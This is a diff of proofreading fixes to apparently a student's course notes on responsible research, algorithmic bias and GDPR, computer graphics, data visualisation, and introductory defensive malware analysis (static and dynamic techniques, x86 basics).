@@ -101,17 +101,17 @@ The EU sets out six key policies to shape responsible research and innovation pr
|
||||
|
||||
RRI involves a range of stakeholders, who should in one way or another be involved in permanent and ongoing dialogue with one another. These stakeholders include:
|
||||
|
||||
**Policymakers**, who have the ability to bring stakeholders to the table and foster debate. This not only includes government but funding agencies, the directors R&I organisations and anyone else involved in making decisions that shape research and innovation locally, nationally and internationally.
|
||||
**Policymakers**, who have the ability to bring stakeholders to the table and foster debate. This not only includes government but funding agencies, the directors of R&I organisations and anyone else involved in making decisions that shape research and innovation locally, nationally and internationally.
|
||||
|
||||
The **research community** is obviously a key stakeholder in research and innovation and includes everyone in the research and innovation pipeline from science advocates and communicators, to research managers, researchers, technicians and support staff.
|
||||
|
||||
**Business and industry**, from start ups to SMEs to large corporates and transnational companies, are all key to research and bringing innovations to bear on social life.
|
||||
**Business and industry**, from start-ups to SMEs to large corporates and transnational companies, are all key to research and bringing innovations to bear on social life.
|
||||
|
||||
**The education community**, from primary school to university, science centres and museums, and including teachers, students and their families, play a key role in building capacity and promoting public understanding of science and technology.
|
||||
|
||||
**Civil society organisations**, such as trade unions, NGOs and the media, also play important roles in shaping research and innovation.
|
||||
|
||||
RRI seeks to involve these stakeholders in shaping ethically acceptable, socially desirable and sustainable outcomes. Indeed, in recognising that research and innovation reaches beyond the lab, RRI seeks to foster **shared** **responsibility** for research and innovation and ensure that it that serves the public good.
|
||||
RRI seeks to involve these stakeholders in shaping ethically acceptable, socially desirable and sustainable outcomes. Indeed, in recognising that research and innovation reaches beyond the lab, RRI seeks to foster **shared** **responsibility** for research and innovation and ensure that it serves the public good.
|
||||
|
||||
###### Process
|
||||
|
||||
@@ -141,15 +141,15 @@ Abma Tineke and Jacqueline Broerse’s ‘dialogue model’ of participatory res
|
||||
|
||||
**Exploration** is the first phase of the dialogue model and aims to identify and make contact with the different stakeholder organisations, groups, and individuals that should be involved in the research.
|
||||
|
||||
**Consultation** does at it suggests and engages stakeholders separately in a dialogue about the research to ensure their voices are heard. Tineke and Broerse emphasize the importance of paying attention to diversity (age, gender, ethnicity, etc.) and being sensitive to asymmetries in power in doing this.
|
||||
**Consultation** does as it suggests and engages stakeholders separately in a dialogue about the research to ensure their voices are heard. Tineke and Broerse emphasise the importance of paying attention to diversity (age, gender, ethnicity, etc.) and being sensitive to asymmetries in power in doing this.
|
||||
|
||||
- They underscore the need to empower stakeholders who are not used to actively participating in research to enable “more equal interaction with professionals” and that researchers should pay particular attention to the issues that matter to specific stakeholders.
|
||||
- Consultation also involves determining appropriate methods of conducting research dialogues with stakeholders, e.g., interviews, focus groups, questionnaires, observations, etc.
|
||||
|
||||
**Prioritisation** as the name suggests is about identifying which research themes that emerge from the consultation process should be take priority.
|
||||
**Prioritisation** as the name suggests is about identifying which research themes that emerge from the consultation process should take priority.
|
||||
|
||||
- This often an iterative process involving further consultation with stakeholders to ensure the right themes are being prioritised appropriately.
|
||||
- Importantly it involves consideration of what can reasonably be expected to be achieved within the lifetime of project, which means that while a theme may have high priority for stakeholders, it may not be technically achievable in the available timeframes, which may lead to it being de-prioritised.
|
||||
- This is often an iterative process involving further consultation with stakeholders to ensure the right themes are being prioritised appropriately.
|
||||
- Importantly it involves consideration of what can reasonably be expected to be achieved within the lifetime of the project, which means that while a theme may have high priority for stakeholders, it may not be technically achievable in the available timeframes, which may lead to it being de-prioritised.
|
||||
- Prioritisation is a matter of compromise between what stakeholders want and what can be technically delivered.
|
||||
|
||||
**Integration** seeks to combine the prioritised research themes into a coherent research agenda.
|
||||
@@ -159,7 +159,7 @@ Abma Tineke and Jacqueline Broerse’s ‘dialogue model’ of participatory res
|
||||
|
||||
The **programming** phase involves specifying a research plan to enable the research agenda to be implemented.
|
||||
|
||||
- It involves setting a programming committee involving stakeholder representatives to ensure the research addresses the concerns of all stakeholders as it proceeds into implementation.
|
||||
- It involves setting up a programming committee involving stakeholder representatives to ensure the research addresses the concerns of all stakeholders as it proceeds into implementation.
|
||||
|
||||
And **implementation** obviously involves putting the plan into practice.
|
||||
|
||||
@@ -171,11 +171,11 @@ The collective resources approach led to action-based and experience-based desig
|
||||
|
||||
Prototyping was established as an alternative approach to requirements specification in the 1970s, replacing a written document subject to the vagaries of interpretation with a functioning version of a computing system.
|
||||
|
||||
The **problem** with prototyping is that it is by its very nature a technical exercise, all too often preoccupied with demonstrating technical features to stakeholders and having them sign-off on them.
|
||||
The **problem** with prototyping is that it is by its very nature a technical exercise, all too often preoccupied with demonstrating technical features to stakeholders and having them sign off on them.
|
||||
|
||||
The challenge that Cooperative Design set out tackle was how to *involve* ordinary people – users and other non-technical stakeholders – in the actual development of prototypes.
|
||||
The challenge that Cooperative Design set out to tackle was how to *involve* ordinary people – users and other non-technical stakeholders – in the actual development of prototypes.
|
||||
|
||||
Prototyping is a common feature of many design models today, from the spiral model to agile. The contribution of Cooperative Design is to use it as a vehicle for put stakeholder viewpoints and experience at the centre of the design process, not technical specifications and feature demonstrations, and it provides us with a tried and tested way of doing participatory research in computing.
|
||||
Prototyping is a common feature of many design models today, from the spiral model to agile. The contribution of Cooperative Design is to use it as a vehicle for putting stakeholder viewpoints and experience at the centre of the design process, not technical specifications and feature demonstrations, and it provides us with a tried and tested way of doing participatory research in computing.
|
||||
|
||||
### RRI self-reflection tool
|
||||
|
||||
|
||||
@@ -12,11 +12,11 @@ According to code 1.4 from the ACM code of ethics, computing professionals shoul
|
||||
|
||||
#### b)
|
||||
|
||||
Algorithmic bias is a series of systematic and repeatable errors, that over the course of the systems runtime, produces output that dis-proportionally discriminates against individuals and/or social groups. Selena Silva and Martin Kenny found 9 sources of algorithmic bias in their research paper, all of which capable of discriminating and producing bias
|
||||
Algorithmic bias is a series of systematic and repeatable errors that, over the course of the system’s runtime, produces output that disproportionately discriminates against individuals and/or social groups. Selena Silva and Martin Kenny found 9 sources of algorithmic bias in their research paper, all of which are capable of discriminating and producing bias
|
||||
|
||||
Bias can be introduced in the development of a machine learning system. Training bias is where data used to train the algorithm may be unrepresentive or prejudiced, this can cause the system to unfairly associate one trait to another even though they have no effect on one another. This can be through the developers own bias by only including data sets representative to their own socitak group or through systemic bias where minority groups are under represented in national and global data sets. Developers can also introduce bias by including or excluding certain attributes. This is called algorithmic focus bias and developers must take variables supplied to the algorithm into careful consideration, evaluating why each variable needs to be included in the system. Similarly bias can arise from the way data is processed, for example this can be from weighting quantitative attributes higher than qualitative ones simply as quantitative data is easier to manipulate, this is called algorithmic processing bias. Non-transparency bias is where companies do not divulge or explain how they came to certain decisions, what their rationale was for different design choices. In the best case this can introduce bias in an unforeseen way as all the developers may come from similar social groups and in the worse case scenario developers can obstruct reviews of the algorithm, allowing discrimination to take place.
|
||||
Bias can be introduced in the development of a machine learning system. Training bias is where data used to train the algorithm may be unrepresentative or prejudiced; this can cause the system to unfairly associate one trait with another even though they have no effect on one another. This can be through the developers’ own bias by only including data sets representative of their own social group or through systemic bias where minority groups are under-represented in national and global data sets. Developers can also introduce bias by including or excluding certain attributes. This is called algorithmic focus bias and developers must take variables supplied to the algorithm into careful consideration, evaluating why each variable needs to be included in the system. Similarly, bias can arise from the way data is processed, for example from weighting quantitative attributes higher than qualitative ones simply because quantitative data is easier to manipulate; this is called algorithmic processing bias. Non-transparency bias is where companies do not divulge or explain how they came to certain decisions or what their rationale was for different design choices. In the best case this can introduce bias in an unforeseen way as all the developers may come from similar social groups and in the worst-case scenario developers can obstruct reviews of the algorithm, allowing discrimination to take place.
|
||||
|
||||
Bias can also arise in the use of computing systems. Transfer context bias is where machine learning systems are used inappropriately. This can happen in job applications where credit checks are required or in justice systems where race needs to be explicitly stated. The assumption job performance correlates to wealth or criminal charges correlates to race is unfair and biased. Therefore the use of computer systems particularly in subjective use cases should be scrutinised to ensure the potential benefits outweigh the increased chance of discriminating or additional steps are taken after the system outputs to mitigate any potential harms. Similarly automation bias is where humans hold the output of a system in high regard and don’t question or apply additional thought. Computer systems used in subjective context such as justice systems should be treated as a second opinion or a statistical model and disregarded readily when an unsuitable result is returned. Consumer bias is where bias is introduced to the system via the training data. Humans are inherently flawed and biased and therefore extra care and additional review steps should be added to check the neutrality of the training data. Likewise feedback loop bias affects systems that learn from user behaviour, which again is prone to being discriminatory. This requires special attention has even when a system has been developed without bias, bias is introduced through the systems use lifetime. Lastly interpretation bias is where humans introduce bias from interpreting results from the algorithm. For example if the algorithm agrees with someones own bias, they might be more likely to give a more extreme verdict however if it opposes their own opinion, the result may be completely disregarded.
|
||||
Bias can also arise in the use of computing systems. Transfer context bias is where machine learning systems are used inappropriately. This can happen in job applications where credit checks are required or in justice systems where race needs to be explicitly stated. The assumption that job performance correlates with wealth or criminal charges correlate with race is unfair and biased. Therefore, the use of computer systems particularly in subjective use cases should be scrutinised to ensure the potential benefits outweigh the increased chance of discriminating or additional steps are taken after the system outputs to mitigate any potential harms. Similarly, automation bias is where humans hold the output of a system in high regard and don’t question it or apply additional thought. Computer systems used in subjective contexts such as justice systems should be treated as a second opinion or a statistical model and disregarded readily when an unsuitable result is returned. Consumer bias is where bias is introduced to the system via the training data. Humans are inherently flawed and biased and therefore extra care and additional review steps should be added to check the neutrality of the training data. Likewise, feedback loop bias affects systems that learn from user behaviour, which again is prone to being discriminatory. This requires special attention as even when a system has been developed without bias, bias is introduced through the system’s useful lifetime. Lastly, interpretation bias is where humans introduce bias from interpreting results from the algorithm. For example, if the algorithm agrees with someone’s own bias, they might be more likely to give a more extreme verdict; however, if it opposes their own opinion, the result may be completely disregarded.
|
||||
|
||||
## Question 3
|
||||
|
||||
@@ -30,15 +30,14 @@ The application scope is worldwide, the regulation states “This Regulation app
|
||||
|
||||
To enable proper data protection by design and default, a number of presets must be implemented.
|
||||
|
||||
Firstly controllers must be transparent about how and why they are collecting and using data, how they use and share personal data and how data subjects can exercise their legal rights over data processing. This includes the right to: access, object, intervene, restrict, rectify, export and erase. This allows for data subjects to have full knowledge and control over their data and on top of this, recital 63 of GDPR states “where possible controller[s] should … provide remote access … with direct access to his or her personal data”. Controllers must also by default declare a valid legal basis for the processing. This ensures transparency as there is full disclosure of how data subjects legal rights are being maintained.
|
||||
Firstly, controllers must be transparent about how and why they are collecting and using data, how they use and share personal data and how data subjects can exercise their legal rights over data processing. This includes the right to: access, object, intervene, restrict, rectify, export and erase. This allows for data subjects to have full knowledge and control over their data and on top of this, recital 63 of GDPR states “where possible controller[s] should … provide remote access … with direct access to his or her personal data”. Controllers must also by default declare a valid legal basis for the processing. This ensures transparency as there is full disclosure of how data subjects’ legal rights are being maintained.
|
||||
|
||||
Controllers must ensure their data processing operations are fair. This principle requires personal data should not be processed in ways that are unjustifiably detrimental, unexpected or misleading to the data subject. Fairness is especially prevalent in dealing with AI systems since these do not operate on predefined instructions written by humans, therefore controllers should be able to demonstrate fairness through the inputs and outputs of the system.
|
||||
|
||||
Controllers must explicitly state what the data collected on data subjects will be used for. These must be specific tasks and cannot be processed in way that doesn’t align with the initial reason given. This is called purpose limitation and prevents controllers from collecting as much data as possible for monetary gain or nefarious purposes. This allows data subjects to only give their data to controllers who’s vision aligns with their own.
|
||||
Controllers must explicitly state what the data collected on data subjects will be used for. These must be specific tasks and the data cannot be processed in a way that doesn’t align with the initial reason given. This is called purpose limitation and prevents controllers from collecting as much data as possible for monetary gain or nefarious purposes. This allows data subjects to only give their data to controllers whose vision aligns with their own.
|
||||
|
||||
Controllers must practise data minimisation, this is a practice where the controller must review the data being asked and verifying all pieces of data are needed to meet the purposes for which they are being processed. This can also include the degree of identification, if the purpose is statistical this likely does not require any immediate identifying attributes. If continued identification is needed, data should be pseudonoymised to migrate damages caused from a data breach. Similarly data must be deleted once it has fulfilled it’s purpose. GDPR places no time limit on data storage of anonymised data however this can be reversed engineered and this data should be treated analogous to raw personal data.
|
||||
Controllers must practise data minimisation; this is a practice where the controller must review the data being requested and verify that all pieces of data are needed to meet the purposes for which they are being processed. This can also include the degree of identification; if the purpose is statistical this likely does not require any immediate identifying attributes. If continued identification is needed, data should be pseudonymised to mitigate damage caused by a data breach. Similarly, data must be deleted once it has fulfilled its purpose. GDPR places no time limit on data storage of anonymised data; however, this can be reverse-engineered and this data should be treated analogously to raw personal data.
|
||||
|
||||
Controllers must also ensure data is accurate, and if not it is the controllers duty to rectify or erase mistakes immediately. This is important as data subjects could be relying on this data for employment, housing or other civic needs and not being able to obtain this could cause harm to the data subject and family.
|
||||
Controllers must also ensure data is accurate, and if not it is the controller’s duty to rectify or erase mistakes immediately. This is important as data subjects could be relying on this data for employment, housing or other civic needs and not being able to obtain this could cause harm to the data subject and family.
|
||||
|
||||
Lastly controllers must put substantial measures in place to prevent unauthorised access, accidental loss and destruction or damage. Regular reviews should be conducted, testing security and inviting professional hackers to further test how the system stands up to new hacking methods.
|
||||
|
||||
@@ -12,7 +12,7 @@ Rendering in 2-Dimensions involves the following
|
||||
|
||||
A **vertex** is a point in space and is used to model geometry. A vertex can be presented using a vector, which is like an arrow. Can be written as $v=(3,2,0)$
|
||||
|
||||
A *fragement* is a piece of a triangle which will be drawn to a pixel.
|
||||
A *fragment* is a piece of a triangle which will be drawn to a pixel.
|
||||
|
||||
A section of memory called a **frame buffer** (or colour buffer) stores the colour values that will be used at each pixel.
|
||||
|
||||
@@ -21,15 +21,15 @@ A shader is a program. Shaders are run on the GPU.
|
||||
#### Rendering Stages
|
||||
|
||||
1. Vertex Specification
|
||||
- In the application the vertices making up the triangles are specified, that is, given positions. The application is a software program which might be a Computer Aided Design (CAD), some kind of simulation, a visualisation, or a videogame. The graphics programmer specifies the location of vertices which make up the triangles to be rendered. These vertices are passed to the vertex shaders.
|
||||
- In the application the vertices making up the triangles are specified, that is, given positions. The application is a software program which might be a computer-aided design (CAD) program, some kind of simulation, a visualisation, or a video game. The graphics programmer specifies the location of vertices which make up the triangles to be rendered. These vertices are passed to the vertex shaders.
|
||||
2. Vertex Shader
|
||||
- Vertex processing by the vertex shader moves the vertices around. . The Vertices are used to construct triangles.
|
||||
- Vertex processing by the vertex shader moves the vertices around. The vertices are used to construct triangles.
|
||||
3. Rasterisation
|
||||
- There may be empty space around the triangles. Rasterisation is the process of taking all of the triangles and figuring out which pixels are inside each of the triangles.
|
||||
- Each of these pixels inside the triangles is called a fragment.
|
||||
- Rasterisation will generate a fragment for each pixel which is inside a triangle. The fragments are passed to the fragment shaders.
|
||||
4. Fragment Shader
|
||||
- The colour of Fragments is calculated by the fragment shader.
|
||||
- The colour of fragments is calculated by the fragment shader.
|
||||
|
||||
## Rasterisation
|
||||
|
||||
@@ -46,11 +46,11 @@ for each pixel y in Y dimension {
|
||||
}
|
||||
```
|
||||
|
||||
#### Barcentric Coordinates
|
||||
#### Barycentric Coordinates
|
||||
|
||||
We can use this to calculate if a point is inside a triangle or not.
|
||||
|
||||
The barrcentric coordintates are $\alpha, \beta, \gamma$.
|
||||
The barycentric coordinates are $\alpha, \beta, \gamma$.
|
||||
|
||||
$\alpha$ corresponds to the normalised linear distance of P between the line $\alpha$=0 and $\alpha$=1
|
||||
|
||||
|
||||
@@ -12,9 +12,8 @@
|
||||
|
||||
4. Specify vertices (C)
|
||||
|
||||
5. Setup objects to communicate to the shaders (OpenGL)
|
||||
5. Set up objects to communicate with the shaders (OpenGL)
|
||||
|
||||
6. Render loop (OpenGL)
|
||||
|
||||
7. Deinitialisation (GLFW)
|
||||
|
||||
@@ -4,13 +4,13 @@
|
||||
|
||||
- The n-dimensional Euclidean Space is $\mathbb{R}^n$
|
||||
- $\mathbb{R}^n = \{(v_0, v_1, ... v_{n-1}) | v_0, v_1, ...v_{n-1} \in \mathbb{R}\}$
|
||||
- A vector is an n-turple
|
||||
- A vector is an n-tuple
|
||||
- $v\in \mathbb{R}^n \Longleftrightarrow v=(v_0, v_1, ...v_{n-1}) | v_0, v_1, ...v_{n-1} \in \mathbb{R}$
|
||||
- In computer graphics we normally deal with 3-Dimensional Euclidean space $\mathbb{R}^3$
|
||||
- vec3 notation:
|
||||
- $v=(v_0, v_1, v_2)$
|
||||
- $v = \begin{pmatrix} {v_0}\\{v_1}\\{v_2} \end{pmatrix}$
|
||||
- Where $v_0$ represents x, $v_1$ represents y, and $v_2$ represents z axis
|
||||
- Where $v_0$ represents the x axis, $v_1$ represents the y axis, and $v_2$ represents the z axis
|
||||
|
||||
##### Vector Scaling
|
||||
|
||||
@@ -104,18 +104,18 @@ Two matrices can only be multiplied if they both have the same number of columns
|
||||
|
||||
To get the resulting matrix, for each $(x,y)$ pair, is the cross product of the $x^{th}$ column and the $y^{th}$ row.
|
||||
|
||||
- Matrix multiplication is not communative
|
||||
- Matrix multiplication is not commutative
|
||||
- $MN \neq NM$
|
||||
|
||||
###### Matrix-Vector Multiplication
|
||||
|
||||
A matrix multiplied by vector gives new vector
|
||||
A matrix multiplied by a vector gives a new vector
|
||||
|
||||
Each row of the resulting vector is that row of the vector, dot producted with that row on the matrix.
|
||||
|
||||
##### Trigonometry
|
||||
|
||||
If $p=(p_x, p_y)$ is a unit vector, we can write them as:
|
||||
If $p=(p_x, p_y)$ is a unit vector, we can write its components as:
|
||||
|
||||
$$
|
||||
p_x = cos \space \alpha \\
|
||||
|
||||
@@ -33,7 +33,7 @@ $$
|
||||
v \cdot s = \begin{pmatrix} v_0 \cdot s_0 \\ v_1\cdot s_1 \end{pmatrix}
|
||||
$$
|
||||
|
||||
We can scale triangles by scaling each of its vertices
|
||||
We can scale triangles by scaling each of their vertices
|
||||
|
||||
### Transformation Matrix
|
||||
|
||||
@@ -106,7 +106,7 @@ z:
|
||||
|
||||
#### Combining Transformations
|
||||
|
||||
For example if point $p$ needs to be scaled by $s=(2,1,1)$ and then translated by $t=(1,0,0)$
|
||||
For example, if point $p$ needs to be scaled by $s=(2,1,1)$ and then translated by $t=(1,0,0)$
|
||||
|
||||
$$
|
||||
S = \begin{pmatrix}
|
||||
|
||||
@@ -9,7 +9,7 @@
|
||||
- A cube has one vertex at each corner which are positioned relative to the centre of the cube
|
||||
- In model space there is no information about where a model is relative to anything in the world, there is only information about the relative positions of the vertices which make up the model
|
||||
- **World Space**
|
||||
- World space is relative top a larger coordinate system
|
||||
- World space is relative to a larger coordinate system
|
||||
- Vertices are positioned in model space and then all moved to the appropriate position in the world
|
||||
- **View Space**
|
||||
- View space has all vertices from the perspective of the viewer
|
||||
@@ -21,7 +21,7 @@
|
||||
- Vertices inside the NDC space will be rendered at those positions
|
||||
- **Screen space**
|
||||
- Screen space maps directly to the pixels on the screen
|
||||
- From now vertices can be used to construct triangles, which are rasterised and the appropriate pixels are coloured
|
||||
- From this point, vertices can be used to construct triangles, which are rasterised and the appropriate pixels are coloured
|
||||
|
||||
- Model Transform
|
||||
- The transformation of vertices from model space to world space
|
||||
|
||||
@@ -10,15 +10,20 @@ The four rendering stages:
|
||||

|
||||
|
||||
- **Application stage** is the software that runs on the CPU
|
||||
- 
|
||||
|
||||

|
||||
|
||||
- **Vertex processing stage** is responsible for processing operations on individual vertices
|
||||
- In this stage vertex positions are transformed from model space to world and then view space, and projected to clip coordinates
|
||||
- Vertex **post processing**:
|
||||
- Vertex **post-processing**:
|
||||
1. Primitive Assembly
|
||||
2. Clipping
|
||||
- 
|
||||
|
||||

|
||||
|
||||
3. Perspective divide
|
||||
4. View-port transformation
|
||||
4. Viewport transformation
|
||||
|
||||
- **Rasterisation stage** is responsible for calculating all of the pixels inside the triangles that are being rendered
|
||||
- **Pixel processing stage** is responsible for processing operations on individual fragments.
|
||||
- Texturing can also happen in the fragment shader
|
||||
|
||||
@@ -12,14 +12,14 @@ A camera involves
|
||||
3. A right direction
|
||||
4. An up direction
|
||||
|
||||
Calculating a camera direction can be achieved using Euler angles, **pitch**, **yaw** and **roll** .
|
||||
Calculating a camera direction can be achieved using Euler angles, **pitch**, **yaw** and **roll**.
|
||||
|
||||
- Pitch rotates the camera on the x axis
|
||||
- Think of a plane pointing its nose to the floor or to the sky
|
||||
- Yaw rotates the camera on the y axis
|
||||
- Think a plane moving the nose left to right keeping the wings parallel with the ground
|
||||
- Think of a plane moving the nose left to right keeping the wings parallel with the ground
|
||||
- Roll rotates the camera on the z axis
|
||||
- Think tilting the plane’s wings left and right, but not changing the direction of the nose
|
||||
- Think of tilting the plane’s wings left and right, but not changing the direction of the nose
|
||||
|
||||
#### Model-Viewer Camera
|
||||
|
||||
@@ -49,7 +49,7 @@ The camera has a position in world space and a focus direction `front`, which ca
|
||||
|
||||
We can move this kind of camera, forward, backward, left and right along with pitch, roll and yaw.
|
||||
|
||||
The camera is at the center of the sphere, and the model moves around the edge of the sphere.
|
||||
The camera is at the centre of the sphere, and the model moves around the edge of the sphere.
|
||||
|
||||
A unit vector points from the camera to the model as the front direction of the camera
|
||||
|
||||
|
||||
@@ -4,7 +4,7 @@
|
||||
|
||||
- How do we avoid being overwhelmed?
|
||||
- How do we make sense of the data?
|
||||
- How do we harness this data in decision-making process?
|
||||
- How do we harness this data in the decision-making process?
|
||||
|
||||
###### Objective
|
||||
|
||||
@@ -23,7 +23,7 @@ Here we can see that statistically these sets are similar
|
||||
|
||||

|
||||
|
||||
However graphing them, we can see that these data sets are very different.
|
||||
However, by graphing them, we can see that these data sets are very different.
|
||||
|
||||
#### Common Information Visualisations
|
||||
|
||||
@@ -41,8 +41,3 @@ However graphing them, we can see that these data sets are very different.
|
||||

|
||||
|
||||
Note the use of colour and shape.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -14,22 +14,22 @@
|
||||
|
||||
**Record** information
|
||||
|
||||
- Blueprints, photographs, seimographs
|
||||
- Blueprints, photographs, seismographs
|
||||
|
||||
**Communicate** information to others
|
||||
|
||||
- Share and persuade
|
||||
- Think Florence Nightingale using a graph to show deaths to infection was the leading cause of death in hospitals
|
||||
- Think of Florence Nightingale using a graph to show that infection was the leading cause of death in hospitals
|
||||
- Collaborate and revise
|
||||
- Think the London tube map, before was geographically accurate, now is only topologically accurate
|
||||
- Think of the London tube map: before it was geographically accurate, now it is only topologically accurate
|
||||
|
||||
Analysis data to **support reasoning**
|
||||
Analyse data to **support reasoning**
|
||||
|
||||
- Find patterns
|
||||
- Think the London Cholera map, how John Snow found out where the infection was coming from
|
||||
- Think of the London Cholera map, how John Snow found out where the infection was coming from
|
||||
- Discover errors in data
|
||||
- Expand memory
|
||||
- Imaging doing a sum like $34\times 52$ mentally verses with a pen and paper
|
||||
- Imagine doing a sum like $34\times 52$ mentally versus with a pen and paper
|
||||
- Visualising the sum (column multiplication) can expand your memory
|
||||
- Develop and assess hypotheses
|
||||
|
||||
@@ -78,6 +78,5 @@ Analysis data to **support reasoning**
|
||||
|
||||
##### Interaction is Vital for Exploration
|
||||
|
||||
- Engage in a dialog with your data
|
||||
- Engage in a dialogue with your data
|
||||
- Employ interaction in a more fundamental manner to strengthen the power of visualisation
|
||||
|
||||
@@ -7,20 +7,20 @@
|
||||
- Provide information about its functionality
|
||||
- Provide information that will allow us to produce network signatures
|
||||
- Basic static analysis is straightforward and quick
|
||||
- However is largely ineffective against sophisticated malware.
|
||||
- However, it is largely ineffective against sophisticated malware.
|
||||
|
||||
##### Techniques
|
||||
|
||||
- Using **antivirus tools** to confirm maliciousness
|
||||
- virus total is an online tool to scan files for known malware
|
||||
- VirusTotal is an online tool to scan files for known malware
|
||||
- Using **hashes** to identify malware
|
||||
- When the file is run through a hashing algorithm (often `md5` or `SHA-1`) it uniquely identifies it.
|
||||
- This is useful to see if other malware analysts have seen this malware
|
||||
- Gleaning information from a **file’s strings**, functions and headers
|
||||
- Note: microsoft uses the term wide character to describe its implementation of Uni-code strings.
|
||||
- Note: Microsoft uses the term wide character to describe its implementation of Unicode strings.
|
||||
- Strings can return
|
||||
- IP addresses to where the malware is sending/receiving
|
||||
- Windows system calls like `GetLayout` & `SetLayout` which are used in windows graphics library
|
||||
- Windows system calls like `GetLayout` & `SetLayout` which are used in the Windows graphics library
|
||||
- Windows libraries such as `GDI32.DLL` which is a graphics library.
|
||||
- Therefore we can infer this malware opens a GUI display
|
||||
- Note: strings will show the executable’s manifest at the end, a brief `xml` file.
|
||||
@@ -30,19 +30,19 @@
|
||||
- Running the malware and observing its behaviour on the system in order to:
|
||||
- remove the infection
|
||||
- produce effective signatures
|
||||
- Is important to note that a safe environment should be set up, so that the malware can be run without risk of damage to your system or network
|
||||
- It is important to note that a safe environment should be set up, so that the malware can be run without risk of damage to your system or network
|
||||
- Like basic static analysis, this can be useful but can miss important functionality
|
||||
|
||||
### Advanced Static Analysis
|
||||
|
||||
- Reverse-engineering the malware’s internals by loading the executable into a disassembler
|
||||
- This involves looking at the instructions to discover what the malware does
|
||||
- This requires an in-depth knowledge of disassembly, code constructs and windows operating system constructs
|
||||
- This requires an in-depth knowledge of disassembly, code constructs and Windows operating system constructs
|
||||
|
||||
#### Problems with Static Analysis
|
||||
|
||||
- Only shows us what is in the program
|
||||
- Not how it is used (if it used at all)
|
||||
- Not how it is used (if it is used at all)
|
||||
- Might see potential filename - but is that file created or deleted
|
||||
- Does it get used every time the program is run or under certain circumstances
|
||||
- Unsure of sequence of events
|
||||
@@ -89,7 +89,7 @@ One of the most useful pieces of information we can gather about a program is th
|
||||
|
||||
When a library is statically linked, all code from that library is copied into the executable which makes the executable grow in size.
|
||||
|
||||
- It is difficult to differentiate between the programs code and the imported code as nothing in the PE header suggests the file contains linked code
|
||||
- It is difficult to differentiate between the program’s code and the imported code as nothing in the PE header suggests the file contains linked code
|
||||
- This is the most uncommon method of linking
|
||||
|
||||
##### Run-time Linking
|
||||
@@ -114,11 +114,11 @@ When libraries are dynamically linked, the host OS searches for necessary librar
|
||||
|
||||
#### Common imported functions
|
||||
|
||||
The PE file header also includes information about specific functions used by an executable. The names alone will give clues however microsoft documents everything on MSDN
|
||||
The PE file header also includes information about specific functions used by an executable. The names alone will give clues; however, Microsoft documents everything on MSDN
|
||||
|
||||
- `FindFirstFileW`, `FindNextFileW`, `FindClose`
|
||||
- These all involve searching the users system for files
|
||||
- `FindFirstFileW` will include a string for regex, so we can see if its searching for all files `./*` or a specific `myFile.exe`
|
||||
- These all involve searching the user’s system for files
|
||||
- `FindFirstFileW` will include a string for regex, so we can see if it’s searching for all files `./*` or a specific `myFile.exe`
|
||||
- `ReadFile`, `WriteFile`
|
||||
- `SetWindowsHookExW`
|
||||
- Often used to implement keylogs
|
||||
@@ -137,4 +137,3 @@ The PE file header also includes information about specific functions used by an
|
||||
| Sections | Names of sections in the file and their sizes on disk and in memory |
|
||||
| Subsystem | Indicates whether the program is a command-line or GUI application |
|
||||
| Resources | Strings, icons, menus |
|
||||
|
||||
@@ -17,7 +17,7 @@ Programs = data structures + algorithms
|
||||
##### External Actions
|
||||
|
||||
- Programs also have effects outside the program
|
||||
- Can monitor the external actions and get an idea about the programs activity
|
||||
- Can monitor the external actions and get an idea about the program’s activity
|
||||
- Not just what the program does but also the order the program performs those actions
|
||||
|
||||
##### Running the Malware
|
||||
@@ -27,18 +27,18 @@ Note:
|
||||
- It is important that dynamic analysis is done after the program has been statically analysed
|
||||
- This is because the malware can put your system and network at risk
|
||||
- Can be tricky to make the malware run
|
||||
- If its distributed as a `.exe`, then we can just run it
|
||||
- If it’s distributed as an `.exe`, then we can just run it
|
||||
- But might do different things based on command line options
|
||||
- If its distributed as `.DLL`, then its more complicated
|
||||
- If it’s distributed as a `.DLL`, then it’s more complicated
|
||||
- Can use `rundll32.exe` to start it and specify the export to call
|
||||
- As a last resort you can force the `.dll` to behave as a `.exe` by editing the PE header
|
||||
- As a last resort you can force the `.dll` to behave as an `.exe` by editing the PE header
|
||||
|
||||
#### Monitoring with Process Monitor - ProcMon
|
||||
|
||||
Process Monitor or procmon is an advanced monitoring tool for Windows that provides a way to monitor certain registry, file system, process and thread activity.
|
||||
|
||||
- Procmon monitors all system calls
|
||||
- Because there are so many system calls (around 50,000 per minute) it is import to filter by type
|
||||
- Because there are so many system calls (around 50,000 per minute) it is important to filter by type
|
||||
- Filter by:
|
||||
- **Registry** - Tells us how malware installs itself into the registry
|
||||
- **File System** - Shows us all the files that the malware creates or config files it uses
|
||||
@@ -50,9 +50,9 @@ Process Monitor or procmon is an advanced monitoring tool for Windows that provi
|
||||
An open-source registry comparison tool that allows you to take and compare two registry snapshots.
|
||||
|
||||
- We can look for added values
|
||||
- A malware has added a new registry key
|
||||
- Malware has added a new registry key
|
||||
- Or modified keys
|
||||
- A malware has modified a registry perhaps inserting itself into non-malicious software
|
||||
- Malware has modified a registry, perhaps inserting itself into non-malicious software
|
||||
|
||||
### General Steps
|
||||
|
||||
@@ -61,4 +61,3 @@ An open-source registry comparison tool that allows you to take and compare two
|
||||
3. Get an initial snapshot with RegShot
|
||||
4. Run the malware
|
||||
5. Take another snapshot and compare, also analysing procmon and process explorer.
|
||||
|
||||
@@ -1,13 +1,13 @@
|
||||
# Crash Course in x86 Assembler
|
||||
|
||||
- Malware authors creates programs at the high-level language and use a compiler to generate machine code to by run by the CPU
|
||||
- Malware analysts operate at the low-level language. Using disassembler to generate assembly code from the machine code to try and understand how the malware works
|
||||
- Malware authors create programs in a high-level language and use a compiler to generate machine code to be run by the CPU
|
||||
- Malware analysts operate at the low-level language, using a disassembler to generate assembly code from the machine code to try and understand how the malware works
|
||||
|
||||

|
||||
|
||||
### x86 Architecture
|
||||
|
||||
x86 architecture follows the Von Neuman architecture and has three hardware components
|
||||
x86 architecture follows the von Neumann architecture and has three hardware components
|
||||
|
||||
- CPU executes code
|
||||
- Main memory (RAM) stores all data and code instructions
|
||||
@@ -23,7 +23,7 @@ The main memory for a single program can be divided into the following four majo
|
||||
|
||||
**Data** - Contains values that are put in place when a program is initially loaded
|
||||
|
||||
**Code** - Includes the instructions fetched by the CPU to execute the programs tasks. The code controls what the program does
|
||||
